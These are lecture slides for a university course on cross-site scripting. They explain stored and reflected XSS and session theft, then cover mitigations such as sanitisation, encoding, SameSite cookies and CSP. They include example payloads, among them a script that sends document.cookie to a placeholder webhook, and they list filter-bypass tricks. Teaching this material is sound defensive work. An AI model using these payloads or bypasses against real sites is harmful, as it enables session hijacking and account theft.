Extended Lecture Week 3

Cross Site Scripting (XSS)

Hello I am not Kris :)

Briefly - whoami

  • Jesse Merhi (Like that plant + “he”)
  • Product Security @ Atlassian
  • I tutor this course and 6443 (web apps)
  • Kris is sick (like the bad kind)

Alright, COMP3900, what's it about?

I was kidding

No he wasn't, he actually thought he was teaching 3900.

Reminder about DBAD (Don't be a …)

  • In week 1 we had tables dropped, and challenges broken (I will show you if you want lol).
  • In week 2 it was pretty tame.
  • This week we potentially have another case of DBAD
FOO="fake admin"
  • Stealing FOO sessions
  • Stealing FOO credentials
  • Asking Kris (FOO) what is a JWT in the next lecture
  • Anything that doesn’t impact another student :)

Please don't ruin the experience for other people.

If you want to experiment do so on your own hardware :)

Question, Queries, Qoncerns?

Onto XSS

What we need to know

  1. Basic Programming (Bonus points if it is Javascript)
  2. HTML
  3. Your credit card number

Who here knows what HTML is?

HTML is just a funky way to define boxes on a website.

For example what does this look like?

<div style="background-color:blue;text-align:center;">
    Box
</div>
Box

What about this?

<div style="background-color:blue;text-align:center;">
    Box
</div>
<div style="background-color:red;text-align:center;">
    Box
</div>
Box
Box

This can get a bit crazy

Box
Box
Box

Jesse Shows the Class how to open dev tools and look at boxes

Just a bunch o’ boxes (crazy stuff)

Back to what we need to know

Who knows Python?

Who knows C?

Who knows Java?

Does anyone here not know any of these?

Great so if you know basically any programming language, you are half way there.

What is Javascript?

Actually does anyone here know?

Javascript is like most other languages

  • But its (mostly) used in a browser.
  • Pretty much every website you have visited has some sort of javascript on it.
  • My website has javascript (Jesse presses the theme button)
  • The main difference is that it is designed with browser and webpage interaction in mind.

Demo Time

https://github.com/jesse-merhi/xss-sqli-demo

Secure commenting site

  • You can securely comment
  • You can even HTML things which is nice
  • How does this work? Go to the repo to find out :)
  • Melon originally wrote it (thanks melon)

Javascript Console

  • Javascript is super similar to python
  • The console lets you run individual LINES of javascript.
  • VERY similar languages
# In Python we do
print("Hello World")
// In Javascript we do
console.log("Hello World");
  • Javascript is designed to interact with a browser!
  • Some cool things you can do:
document.location = "https://www.google.com"; // navigate the browser to another page
print("JESSE"); // in a browser, print() opens the print dialog (it is not Python's print!)
document.querySelectorAll("*").forEach((element) => {
  element.style.backgroundColor = "red"; // paint every box on the page red
});

What is the <script> tag?

We can make javascript run on someone else's computer!

QUESTIONS?

Cross Site Scripting (XSS)

Self-Retweeting Tweet

Here is another one

https://jmerhi.mov/bad

XSS is basically any vulnerability that allows javascript to run on someone else's computer.

  • Stored XSS: Javascript that is stored (usually in a database) and is executed!

  • Reflected XSS: Javascript that is carried in the request (usually a link you are sent) and reflected back into the page by the server, so it is executed when that page is opened

DOM BASED XSS (not assessable)

hollow

  • Basically you are modifying the webpage in your XSS to trigger some things to happen.
  • Not assessed.
  • Stored XSS is really bad because it is persistent

  • Reflected is not as bad because it requires the user to do something (clicking a link perhaps).

Back to the secrets page :)

QUESTIONS?

Sessions

What is a session?

JESSE REALISES THAT HE IS LOGGED OUT OF GOOGLE

https://www.google.com/

Stealing Sessions

document.cookie;
// Attacker can steal all of my cookies and login as me!
<script>send_to_attacker(document.cookie)</script>

Did someone say demo?

<script>
fetch("webhookurl?"+ document.cookie)
</script>

Some example XSS Payloads:


<script>alert(1)</script>
<script>console.log("haqd")</script>
<script>print("haqd")</script>

<img src="x" onerror="alert(1)" />

Some good resources

MY COOKIES!!!!

Oh well…

Mitigating XSS

Basic WAF stuff

  • Sanitisation: stripping out unsafe tags/attributes
    • <script>alert(1)</script> → alert(1)
  • Encoding: escaping control characters
    • <> → &lt;&gt;
  • Validation: allow/block-listing of content
    • block requests if you detect bad content

Don’t use raw user input

  • .innerHTML treats content as HTML (control)

    • use .innerText which treats it as data
  • sanitize your input with a library (e.g. DOMPurify)

  • don’t write vanilla JS, use a framework.

    • again, even if you use a framework, make sure the functions you’re using sanitize the input

Breaking mitigations

  • Content stripped/blocked
    • embed dummy characters: <SCRscriptIPT>
    • use alternating case: <ScRiPt>
    • different tag <img onerror=...>
    • different event handler <body onload=...>

here’s a couple more

Protecting those cookies (SameSite)

  • None: Cookies are always sent, even on cross-site requests
  • Lax: (default) not sent on cross-site requests, except top-level navigations
    • images/iframes no
    • navigation (GET) yes
  • Strict: Cookies aren't sent on any cross-site request
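The three SameSite modes above written out as a decision function, as an added example (not code from the lecture). The request descriptions are constructed, and the `Secure` and `HttpOnly` flags in the cookie string are this example's additions: browsers require `Secure` for `SameSite=None`, and `HttpOnly` is what actually keeps the cookie out of `document.cookie` in the stealing demo earlier, since SameSite only governs when the browser attaches the cookie to a request.

```javascript
// Added example: which requests carry a session cookie under each SameSite mode.

// Build a Set-Cookie header value for a session cookie.
// HttpOnly: not readable from document.cookie (the earlier stealing demo fails).
// Secure: HTTPS only; also required by browsers for SameSite=None.
function sessionCookie(value, sameSite) {
  return `session=${value}; Path=/; HttpOnly; Secure; SameSite=${sameSite}`;
}

// Decide whether the browser attaches a cookie with the given SameSite mode.
// request = { crossSite, topLevelNavigation, method } (constructed shape for this demo).
function cookieIsSent(sameSite, request) {
  if (!request.crossSite) return true; // same-site requests always get the cookie
  switch (sameSite) {
    case "None":
      return true; // always sent (must be Secure)
    case "Strict":
      return false; // never sent cross-site
    case "Lax":
      // only top-level navigations with a safe method (clicking a link),
      // not images, iframes, fetch() or cross-site form POSTs
      return request.topLevelNavigation && ["GET", "HEAD"].includes(request.method);
    default:
      throw new Error(`unknown SameSite mode: ${sameSite}`);
  }
}

// Constructed scenarios matching the slide's bullets.
const SCENARIOS = {
  sameSiteXhr: { crossSite: false, topLevelNavigation: false, method: "POST" },
  crossSiteImage: { crossSite: true, topLevelNavigation: false, method: "GET" }, // <img>, <iframe>
  crossSiteLink: { crossSite: true, topLevelNavigation: true, method: "GET" },   // user clicks a link
  crossSiteFormPost: { crossSite: true, topLevelNavigation: true, method: "POST" },
};

// Matrix of mode -> scenario -> cookie sent?
function sameSiteMatrix(scenarios = SCENARIOS) {
  const matrix = {};
  for (const mode of ["None", "Lax", "Strict"]) {
    matrix[mode] = {};
    for (const [name, request] of Object.entries(scenarios)) {
      matrix[mode][name] = cookieIsSent(mode, request);
    }
  }
  return matrix;
}

console.log(sessionCookie("s3ss10n", "Lax"));
console.table(sameSiteMatrix());
```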

read more here

In Short

  1. Filter input on arrival
  2. Encode data on output
  3. Use appropriate response headers (tell the browser how to interpret content)
  4. Content Security Policy

Bonus: Bug Bounties if you find something cool